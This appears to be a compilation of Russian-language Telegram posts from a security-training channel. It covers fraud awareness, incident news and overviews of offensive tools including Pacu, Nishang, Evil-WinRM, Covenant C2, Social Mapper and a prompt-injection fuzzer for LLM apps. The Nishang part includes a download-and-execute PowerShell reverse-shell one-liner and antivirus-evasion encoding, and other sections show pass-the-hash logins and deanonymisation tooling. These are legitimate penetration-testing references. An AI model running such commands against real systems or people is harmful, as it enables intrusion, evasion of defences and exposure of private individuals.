34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
🌐Виды мошенничества в интернете: как обезопасить себя?
Поговорим о мошенничестве в интернете. Согласно статистике Банка России, 34% россиян сталкивались с кибермошенничеством, а 9% из них реально лишились денег.
В статье разбираем основные схемы обмана: от взломов аккаунтов друзей и фейковых вакансий до дипфейков и мошенничества в Telegram.Разбираем, как работают социальная инженерия, скам при онлайн-знакомствах и новые виды фишинга.
Даём практические рекомендации, которые помогут вовремя распознать угрозу и защитить ваши данные.
➡️Читайте подробнее — в нашей статье.
#кибермошенничество #фишинг #правилабезопасности
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Notepad++ под атакой. 2 февраля разработчики Notepad++ опубликовали информацию о том, что их инфраструктура была скомпрометирована.
👉Последствия
Злоумышленники могли перехватывать и перенаправлять трафик обновлений, предназначенный для notepad-plus-plus.org. Трафик от определённых целевых пользователей выборочно перенаправлялся на вредоносные манифесты обновлений, контролируемые злоумышленниками.
Стоит отметить, что компрометация произошла на уровне хостинг-провайдера, а не из-за уязвимостей в самом коде Notepad++.
Вы еще успеваете присоединиться!
Регистрируйтесь здесь @codebypracticum_bot и мы пришлем вам ссылку на эфир в ответном письме.
Курс "Антифрод-аналитик":
узнать подробнее
17 февраля 2026 года слухи о возможной полной блокировке Telegram в России с 1 апреля 2026 года стали неожиданным продолжением политики регуляторов, которые последние полгода вели планомерную атаку на функционал иностранных мессенджеров.
👉Август 2025: Первые ограничения и «глушилки»
13 августа Роскомнадзор объявил о введении мер по частичному ограничению звонков в Telegram и WhatsApp*. В ведомстве объяснили это тем, что мессенджеры стали основными сервисами, используемыми для вымогательства и вовлечения граждан в террористическую деятельность.
РКН не стал уточнять, что означает термин «частичное ограничение». Однако генеральный директор Telecom Daily Денис Кусков пояснил «Ведомостям», что технически это будет проявляться в виде помех: пользователи столкнутся с «бульканьем, шипением и посторонними шумами» во время разговоров.
Примечательно, что проблемы у пользователей начались еще раньше. 11 августа СМИ, включая Forbes и «Коммерсантъ», зафиксировали массовые жалобы на то, что в мессенджерах не проходят звонки. Источники «Коммерсанта» сообщали, что операторы связи (МТС, «МегаФон», «Билайн» и T2) могли начать тестирование соответствующих блокировок еще 1 августа 2025 года.
В Минцифры положительно оценили решение РКН. В министерстве подчеркнули, что доступ к голосовым вызовам будет восстановлен только в случае выполнения мессенджерами требований российского законодательства.
В Telegram в ответ заявили, что принимают меры для предотвращения вредоносного использования платформы, напомнив, что именно они первыми внедрили детальные настройки конфиденциальности звонков.
Однако парламентариев эти аргументы не убедили. Член комитета Госдумы по информполитике Антон Немкин («Единая Россия») в беседе с РИА Новости привел статистику: доля атакованных мошенниками россиян в WhatsApp* с 2024 года выросла в 3,5 раза.
«Тысячи взломанных аккаунтов, подделка номеров и личностей сотрудников банков, фишинг, кража данных – все это стало неотъемлемой частью WhatsApp*», — заявил депутат.
«И если у Telegram есть возможность это сделать, то кейс WhatsApp* серьезно осложняется экстремистским статусом его материнской компании Meta», — написал Горелкин.
«Вокруг возможной полной блокировки Telegram с 1 апреля сейчас слишком много эмоций и слишком мало официальной конкретики. Сама дата 1 апреля вызывает вопросы — на данный момент не прозвучало ни юридических оснований, ни процессуальных разъяснений»,
—
заявил
РИА Новости депутат Антон Немкин.
Сейчас антифрод — одно из самых устойчивых и растущих направлений в ИБ.
Но у большинства нет понимания:
— какие навыки реально требуются?
— как выглядит работа антифрод-аналитика?
— можно ли перейти в это направление без банковского опыта?
18 февраля мы разберём реальный кейс банковского мошенничества вместе с экспертами Codeby.
На практикуме вы увидите:
— как выявляется компрометация аккаунта
— по каким поведенческим сигналам система отличает клиента от злоумышленника
— как аналитик принимает решение при неполных данных
В конце практикума можно будет записаться на индивидуальный разбор с экспертом — чтобы понять, подходит ли вам это направление и какие шаги дают усиление вашей позиции.
⌛18.02 | 18:00 МСК | Бесплатно
Регистрация: @codebypracticum_bot
🚀Курс "Антифрод-аналитик":
узнать подробнее
💫 «14 февраля, 23:58»
— Алло, поддержка? У нас тут фрод-система ослепла.
— В смысле?
— Транзакции идут одна за другой. Все с фрод-скорингом 0. Даже те, где явные боты.
— Правила включены?
— Сто процентов. В админке всё зелёное.
— Антифрод перезагружали?
— Три раза. Бесполезно.
— Логи смотрели? Ошибки есть?
— Ни одной. Всё штатно работает. Но правила молчат.
— Нагрузка какая?
— Пиковая. В два раза выше обычного. Сегодня же 14 февраля.
— А какой час?
— 23:58.
— Так. А ну-ка глянь, кто и когда последний раз в код залезал.
— Сейчас... Вчера вечером был коммит. Что-то про праздничную акцию.
— Ищите в коде сегодняшнюю дату. Быстро.
Мы обновили курс SQL Injection Master
Что стало лучше:
⏺️ Оптимизировали логику работы заданий и систему проверки ответов
⏺️ Повысили стабильность лабораторий и корректность работы под нагрузкой
⏺️ Обновили интерфейс и улучшили пользовательский опыт
⏺️ Доработали отдельные задания для более корректного и предсказуемого поведения
⏺️ Добавили бонусный материал для всех, кто успешно сдал экзамен
Если уже проходили курс — загляните ещё: стало удобнее и стабильнее. Если нет, то самое время начать ➡️ тут
Для всех влюбленных в ИБ!
Иногда достаточно небольшого жеста, чтобы в мире логики и переменных возникло что‑то безусловное. Напомните о своих чувствах на вашем языке — это будет по‑настоящему.
В истории киберпреступности мало фигур, сопоставимых с Альбертом Гонсалесом. Сын кубинских эмигрантов прошел путь от школьника, взломавшего NASA, до информатора Секретной службы и одновременно лидера банды, укравшей данные 170 миллионов банковских карт.
⏺️Как все начиналось
Гонсалес родился в Майами. В 12 лет сам купил первый компьютер, а к 14 взломал сети NASA. Учителя называли его «проблемным лидером группы ботаников». В 1999-м он с приятелями взломал правительственные сервера Индии — визит ФБР закончился лишь предупреждением.
⏺️Shadowcrew и вербовка
К 2002 году Гонсалес переехал в Нью-Джерси и стал ключевой фигурой на подпольном форуме Shadowcrew. Под ником CumbaJohnny он торговал крадеными кредитками. В 2003-м его арестовали случайно — полицейский обратил внимание на парня в женском парике. При нем нашли 15 поддельных карт, а дома — миллионы номеров. Но вместо тюрьмы Гонсалесу предложили сделку: свобода в обмен на сотрудничество.
Он помог внедрить агентов в администрацию Shadowcrew и даже предложил перенести серверы форума на оборудование, которое «принадлежало ему». На самом деле серверы стояли в армейском гараже под контролем Секретной службы. В 2004 году 28 участников Shadowcrew арестовали.
Общий улов — еще
130 миллионов
карт. Операцию назвали
«Get rich or die tryin’»
по мотивам альбома
50 Cent
.
Ущерб от его действий превысил 200 миллионов долларов. Он не был активистом — просто охотником за деньгами, который слишком долго испытывал удачу. Его дело до сих пор изучают в Академии ФБР как классический кейс «крота» из мира хакинга.
🧠 Prompt Fuzzer — интерактивный fuzzer для защиты системного промпта GenAI‑приложений
Prompt Fuzzer — это open source‑утилита для динамического тестирования системного промпта на устойчивость к jailbreak‑атакам, prompt‑инъекциям и попыткам вытянуть системные данные
pip install prompt-security-fuzzer
export OPENAI_API_KEY=sk-123XXXXXXXXXXXX
prompt-security-fuzzer
prompt-security-fuzzer, prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv \
--tests='["ucar","amnesia"]'
Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы
Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.
Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате
JSON
, содержащий информацию о найденных уязвимостях.
pipх install dorkbot
dorkbot -h
dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log
dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune
Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование
🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности
Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.
🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.
💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом.
▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).
⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:
pip3 install -U pip
pip3 install -U pacu
pacu
set_keys по интерактивным подсказкам. docker run -it rhinosecuritylabs/pacu:latest
~/.aws в контейнерdocker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest
⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».
⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.
☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:
Import-Module .\nishang.psm1
. C:\nishang\Gather\Get-Information.ps1
Get-Information
Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand
powershell -e <encoded>
Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки.
🔎 Что такое ART и кому она нужна
ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team.
❗️ Поддерживаемые фреймворки, данные и задачи
➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL.
➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды.
➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п.
⛓️💥 Типы атак в ART
ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз:
⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.).
⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде.
⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение.
⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения.
#ai #security #adversarial #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам
Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.
🔗Возникали ли у вас когда-либо вопросы на каких ресурсах можно безопасно тестировать различные инструменты, предназначенные для поиска уязвимостей в веб-приложениях?
В этой статье познакомимся с некоторыми известными и опенсорсными веб-приложениями, которые специально содержат уязвимостями и предназначены для обучения специалистов и тестирования инструментов безопасности.
➡️OWASP Juice Shop
Уязвимое веб-приложение от компании OWASP, реализованное на JavaScript и TypeScript. Juice Shop содержит более 100 различных уязвимостей, таких как SQL-инъекции, межсайтовый скриптинг (XSS), межсайтовый скриптинг с использованием CSRF (Cross-Site Scripting), переполнение буфера и многое другое.
➡️Установка
docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop
http://localhost:3000. Рекомендуемые системные требования: 384 МБ ОЗУ, 800 МБ свободного места на диске.git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d
http://localhost:4280.docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 webgoat/webgoat
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=America/Boise webgoat/webgoat
http://www.webgoat.local:8080/WebGoat/.
💻Smugglex - инструмент на языке Rust, направленный на выявление уязвимостей HTTP Request Smuggling (CL.TE, TE.CL, TE.TE, H2C, H2) в веб-приложениях.
❗️HTTP Request Smuggling
При десинхронизации HTTP-запросов используются различия в том, как серверы обрабатывают HTTP-запросы. Если внешний и внутренний серверы по-разному определяют границы запроса, злоумышленники могут незаметно передавать вредоносные запросы.
Уязвимость возникает, когда серверы по-разному интерпретируют заголовки:
➡️Content-Length — длина тела сообщения в байтах
➡️Transfer-Encoding — метод кодирования (например, по частям)
Если присутствуют оба заголовка или они скрыты, серверы могут расходиться во мнениях относительно границ запроса.
Успешная эксплуатация данной уязвимости может привести к обходу WAF, отравлению веб-кэша, перехвату сеанса, а также несанкционированному доступу к ресурсам.
🔗Установка
Установить инструмент можно, собрав его из исходного кода.
git clone https://github.com/hahwul/smugglex
cd smugglex
cargo install --path .
# Verbose output
smugglex https://example.com/ -v
# Quick scan (exit on first vulnerability)
smugglex https://example.com/ -1
# Save results to JSON
smugglex https://example.com/ -o results.json
# Test specific attack types
smugglex https://example.com/ -c cl-te,te-cl
smugglex https://target.com/ --exploit localhost-access
Инструмент, написанный на Python, который используется для поиска конечных точек, потенциальных параметров. При его создании в основу был взят инструмент LinkFinder с использованием регулярных выражений для поиска ссылок, но с дополнительными улучшениями, позволяющими находить еще больше ссылок.
pip install xnLinkFinder
#or
pipx install git+https://github.com/xnl-h4ck3r/xnLinkFinder.git
xnLinkFinder -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
xnLinkFinder -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
Evil-WinRM-PY: Инструмент для удаленного администрирования Windows через WinRM
Evil-WinRM-PY — кроссплатформенная Python-реализация Evil-WinRM для удаленного выполнения команд на узлах Windows через WinRM. Предоставляет интерактивную оболочку с функциями передачи файлов, загрузки скриптов/DLL и выполнения EXE в памяти. Поддерживает NTLM, Pass-the-Hash, сертификаты и Kerberos. Инструмент разработан преимущественно для Linux, является стандартным решением в Kali Linux, устанавливается через pip и включает штатную поддержку Kerberos через пакеты libkrb5-dev.
sudo apt install evil-winrm-pyПроверка
evil-winrm-py -h
evil-winrm-py -i 192.168.1.100 -u Administrator -p P@ssw0rd
evil-winrm-py -i dc01.domain.local -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c --ssl
Аутентификация с применением сертификатовevil-winrm-py -i 10.10.10.50 -u user@domain.local --priv-key-pem ./key.pem --cert-pem ./cert.pem
Администрирование серверной инфраструктуры
evil-winrm-py -i srv02.domain.local -u user@DOMAIN.LOCAL -k --spn-prefix WSMAN --spn-hostname srv02.domain.local
evil-winrm-py -i srv01.corp.local -u CORP\admin -p P@ssw0rd --sslОбеспечивает безопасное удаленное управление серверами Windows с шифрованием трафика. Используется для выполнения регламентных задач, диагностики и мониторинга состояния систем.
evil-winrm-py -i 10.0.0.25 -u Administrator -H 8843f4f67bcc0c6e6b5c6d7e8f9a0b1c
BPF Linker: Инструмент статической линковки для современных BPF-программ
BPF Linker (bpf-linker) — специализированное решение для статической линковки объектных файлов BPF-программ, разработанное в рамках экосистемы Aya. Инструмент ориентирован на упрощение сборки современных BPF-приложений при сохранении совместимости с устаревшими, более ограничивающими версиями ядра.
sudo apt install bpf-linker
bpf-linker -h
bpf-linker --cpu v2 --unroll-loops --ignore-inline-never -o legacy.o *.o
bpf-linker --dump-module ./final.ll --log-level debug --log-file ./link.log -o output.o input.o
bpf-linker -O z --disable-memory-builtins -o minimal.o *.o
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — ПОСТимся
——————————————
🗂 В архив добавлены задания + райтапы:
🔵Разное - В поисках флага
🔵Pentest Machines - Тревожный сигнал
Приятного хакинга!
Как усилить свою позицию на рынке ИБ в 2026? Академия Кодебай предлагает системный подход с поддержкой экспертов!
Если вы планируете развиваться в ИБ или углубить текущую специализацию, сейчас открыты наборы по направлениям:
⏺️ DevSecOps-инженер
⏺️ DFIR (цифровая криминалистика и реагирование на инциденты Linux)
⏺️ Реверсивный инжиниринг (Windows и базовый курс)
⏺️ Основы информационной безопасности
⏺️ AppSec инженер
⏺️ Профессия Пентестер
⏺️ Анализ защищенности Android-приложений
Формат — практическое обучение с фокусом на инженерные навыки:
CI/CD и безопасность инфраструктуры, анализ инцидентов, работа с артефактами, исследование ПО без исходников, SAST/DAST, тестирование на проникновение, мобильная безопасность.
Тем временем у нас взят first blood на про-лабе Mr.Robot 👀
Это цепочка из 3 взаимосвязанных машин с вайбом одноимённого сериала: от первой веб-зацепки переходим к скрытым сервисам, внутренней сети и нестандартным протоколам
Если хочется пройти цепочку самому — лаборатория тут: hackerlab.pro/labs/mrrobot
Инструмент с открытым исходным кодом, который использует технологию распознавания лиц для сопоставления профилей в социальных сетях на разных платформах. Автоматически ищет в указываемых социальных сетях имена и фотографии целей для точного определения и группировки профилей. По результатам работы генерирует отчет.
sudo add-apt-repository ppa:mozillateam/firefox-next && sudo apt update && sudo apt upgrade
sudo apt-get install build-essential cmake
sudo apt-get install libgtk-3-dev
sudo apt-get install libboost-all-dev
git clone https://github.com/Greenwolf/social_mapper
cd social_mapper/setup
python3 -m pip install --no-cache-dir -r requirements.txt
python3 social_mapper.py -f imagefolder -i ./Input-Examples/imagefolder/ -m fast -fb -tw
python3 social_mapper.py -f company -i "Evil Corp LLC" -m accurate -a -t strict
☁️ Covenant — .NET C2‑фреймворк для пост-эксплуатаци
Covenant — кросс-платформенный C2 на ASP.NET Core с веб‑панелью, много‑пользовательским режимом и поддержкой «Grunt»‑имплантов для управления скомпрометированными хостами в корпоративных сетях.
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run
https://127.0.0.1:7443/, создать учётку оператора и перейти к настройке Listener/Launcher/Grunt. docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant
🤖 Как выявлять и предотвращать утечки информации по сетевым скрытым каналам
Команда HEX.TEAM приглашает на открытый профессиональный вебинар «Противодействие утечке информации по сетевым скрытым каналам» — с разбором теории, практики и реальных кейсов из проектов.
О чём поговорим:
• как строятся классические и современные сетевые скрытые каналы в различных сетевых протоколах
• как определить, является ли угроза утечки информации по сетевым скрытым каналам реальной для вашей организации
• как выстраивается система защиты от подобных утечек
📅 Дата: 18/02/2026
🕓 Время: 16:00
💻 Онлайн, участие бесплатное
Спикер:
Михаил Финошин
руководитель отдела исследований ИБ HEX.TEAM
старший преподаватель кафедры «Криптология и кибербезопасность» НИЯУ МИФИ
автор более 15 научных публикаций по информационной безопасности
Количество мест ограничено.
👉 Регистрация на вебинар 👈
Подписывайтесь на канал HEX.TEAM - здесь мы регулярно делимся практикой, кейсами и инженерным взглядом на информационную безопасность.
Реклама. Erid: 2VtzqvmkHqd
WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов
WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.
pipх install wafw00f
wafw00f -h
wafw00f https://example.org
wafw00f -l
wafw00f https://site1.com http://site2.net -o results.json
wafw00f https://target.com -a -v
🚩 Новые задания на платформе HackerLab!
🎢 Категория Разное — Drakosha Ali
🔎 Категория OSINT — Спецслужбы
Приятного хакинга!
OSINT-SAP Project
Бесплатный OSINT-SAN Framework дает возможность быстро находить информацию и деанонимизировать пользователей сети интернет. С помощью нашего ПО вы сможете собирать информацию о пользователях как при использовании linux.
📕Характиристика:
1️⃣Сканирование и вывод информации IP и доменных адресов (Whois, shodan, DNS lookup, TCP port scan)
2️⃣Сбор информации о мобильном номере
3️⃣Создание рандомной сетевой личности
4️⃣Поиск по никнейму
5️⃣Поиск по bitcoin кошельку
💻Установка:
git clone https://github.com/Bafomet666/OSINT-SAN.git
cd OSINT-SAN/
pip3 install -r requirements.txt --break-system-packages
python3 osintsan.py
Что такое фишинговые ссылки и как они работают?
"Я же не кликаю на спам"— думаем мы, читая очередной пост о кибербезопасности. Такая уверенность, что фишинг обойдет нас стороной, стала его главным преимуществом. Мошенники постоянно оттачивают свои методы, а фишинговые ловушки становятся все изощреннее. Именно на автоматизм и миг невнимательности они и рассчитывают, создавая идеальные копии сайтов и писем.
Рассказываем, в чем суть фишинга, как проводится эта атака и почему ее жертвами становятся даже опытные пользователи.
➡️ В статье вы найдете рекомендации, как не попасться на мошенническую схему, и четкий план действий на случай, если вы уже оказались в ловушке.
#Фишинг #Инфобезопасность #БезопасностьАккаунтов
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером